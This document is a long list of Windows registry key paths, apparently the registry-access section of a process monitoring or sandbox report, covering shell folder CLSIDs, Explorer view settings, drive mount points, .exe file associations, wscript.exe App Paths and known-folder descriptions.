HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_CLASSES_ROOT\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\wscript.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KnownFolderSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
